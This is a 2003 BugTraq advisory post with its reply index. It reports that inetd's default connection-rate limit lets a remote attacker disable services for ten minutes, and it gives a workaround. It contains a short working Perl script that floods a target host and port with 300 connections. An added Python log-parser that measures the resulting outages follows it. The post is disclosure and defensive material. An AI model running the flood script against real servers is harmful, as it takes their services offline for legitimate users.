BugTraq
11 years of inetd default insecurity? Sep 06 2003 02:08PM
3APA3A (3APA3A SECURITY NNOV RU) (5 replies)
Dear bugtraq (at) securityfocus (dot) com,

Well, we all blame Microsoft for insecure default configurations... Isn't
it time to clean up outdated code in Unix?

I. Intro

Saint_Byte reported a DoS vulnerability in wu-ftp. A small Perl script (like
the one below) kills the ftp service... On closer look we have the good old
inetd feature, and a lot of existing FreeBSD/Linux installations are still
vulnerable. This problem has been known since ancient times [1] and has been
discussed again and again, but it is still present. In fact, the problem is
well known. It's just another rake everyone steps on. It's in every man page
and FAQ, but maybe it's time to resolve it? Because it's definitely a BUG.

II. Who is vulnerable

Any system shipped with network daemons launched through inetd (FreeBSD,
SuSE, Red Hat, etc.).

III. Details

Inetd has an option

-R rate
Specify the maximum number of times a service can be invoked in
one minute; the default is 256. A rate of 0 allows an unlimited
number of invocations.

The problem is, a remote attacker can establish as many connections per
minute as bandwidth allows... Now, guess how inetd reacts if more than
256 connections are received in one minute? It disables the service for the
next 10 minutes to help the attack succeed. Of course, this is documented.
The interval is not configurable.

Something like

Jul 23 15:27:10 host inetd[86]: ftp/tcp server failing (looping), service terminated

will appear in the logs... If the connection is closed by the attacker before
the service actually starts, the attacker's IP address will never be logged.

IV. Workaround

-R 0 -s your_ad_can_be_here

or ask everyone not to bother your server.

V. inetd-DoS-by-default-11-years-anniversary-super-exploit.pl
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
#!/usr/bin/perl
# Opens and immediately closes 300 TCP connections to HOST:PORT,
# more than inetd's default -R limit of 256 per minute.

use Socket;
$host = $ARGV[0];
$port = $ARGV[1];
if ($host eq "" || $port eq "") {
    print "\n Usage progname HOST PORT \n";
    exit 1;
}
$iadr = inet_aton($host) or die "cannot resolve $host\n";
$padr = sockaddr_in($port, $iadr);
for ($i = 0; $i < 300; $i++) {
    socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname("tcp")) or die "socket: $!\n";
    connect(SOCK, $padr) or next;   # skip a failed connect, keep going
    close(SOCK);
}
print "\nDone\n";
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

VI. References:

[1] Ari Luotonen, "www/tcp server failing (looping), service terminated",
http://www.webhistory.org/www.lists/www-talk.1993q4/0312.html

--
http://www.security.nnov.ru
You know my name - look up my number (The Beatles)
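Added example, not part of 3APA3A's post: a small Python detector that scans syslog for the inetd "server failing (looping), service terminated" message quoted in the post and computes, per service, the window during which inetd has disabled it (10 minutes after each message, as the post describes) plus the total downtime per service. The log lines are constructed, and the year is an assumption because syslog timestamps omit it.

```python
import re
from datetime import datetime, timedelta

# Constructed sample syslog lines (not from the original post), in the
# format inetd uses for the "looping" message quoted in the post.
SAMPLE_LOG = """\
Jul 23 15:27:10 host inetd[86]: ftp/tcp server failing (looping), service terminated
Jul 23 15:27:12 host sshd[1201]: Accepted publickey for admin from 192.0.2.10 port 51522
Jul 23 15:40:02 host inetd[86]: telnet/tcp server failing (looping), service terminated
Jul 23 15:45:00 host inetd[86]: ftp/tcp server failing (looping), service terminated
"""

LOOPING_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) inetd\[\d+\]: "
    r"(?P<service>[\w-]+)/(?P<proto>\w+) server failing \(looping\), service terminated$"
)

# inetd keeps a looping service disabled for 10 minutes; only the -R rate is tunable, not this.
DISABLE_WINDOW = timedelta(minutes=10)

def find_service_outages(log_text, year=2003):
    """One dict per 'looping' message; syslog lines carry no year, so it is assumed."""
    outages = []
    for line in log_text.splitlines():
        m = LOOPING_RE.match(line)
        if not m:
            continue
        start = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        outages.append({"host": m["host"], "service": f"{m['service']}/{m['proto']}",
                        "disabled_from": start, "disabled_until": start + DISABLE_WINDOW})
    return outages

def downtime_per_service(outages):
    """Total time each service was disabled, merging overlapping windows."""
    spans = {}
    for o in outages:
        spans.setdefault(o["service"], []).append((o["disabled_from"], o["disabled_until"]))
    totals = {}
    for service, windows in spans.items():
        windows.sort()
        total, (cur_start, cur_end) = timedelta(), windows[0]
        for start, end in windows[1:]:
            if start <= cur_end:  # overlapping or touching: extend the current window
                cur_end = max(cur_end, end)
            else:
                total += cur_end - cur_start
                cur_start, cur_end = start, end
        totals[service] = total + (cur_end - cur_start)
    return totals
```

Running it over a real /var/log/messages gives the outage windows an attacker forced (the message alone does not name the attacker, as the post notes), so the `-R 0` workaround can be judged against the observed downtime.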

Re: 11 years of inetd default insecurity? Sep 09 2003 05:17PM
Darren Pilgrim (dmp bitfreak org)
Re: 11 years of inetd default insecurity? Sep 08 2003 11:24PM
Dan Harkless (bugtraq harkless org)
Re: 11 years of inetd default insecurity? Sep 08 2003 05:50PM
Mike Tancsa (mike sentex net) (1 replies)
Re: 11 years of inetd default insecurity? Sep 09 2003 02:07PM
Jonathan A. Zdziarski (jonathan nuclearelephant com) (1 replies)
Re: 11 years of inetd default insecurity? Sep 10 2003 06:47PM
Greg A. Woods (woods weird com)
Re: 11 years of inetd default insecurity? Sep 08 2003 01:46AM
Thamer Al-Harbash (tmh whitefang com) (1 replies)
Re: 11 years of inetd default insecurity? Sep 08 2003 07:44PM
Dan Stromberg (strombrg dcs nac uci edu) (1 replies)
Re: 11 years of inetd default insecurity? Sep 10 2003 06:40AM
Andres Kroonmaa (andre online ee)
Re: 11 years of inetd default insecurity? Sep 07 2003 09:59PM
Dagmar d'Surreal (dagmar wants nospam com) (1 replies)
Re: 11 years of inetd default insecurity? Sep 08 2003 10:46PM
Mike Hoskins (mike adept org)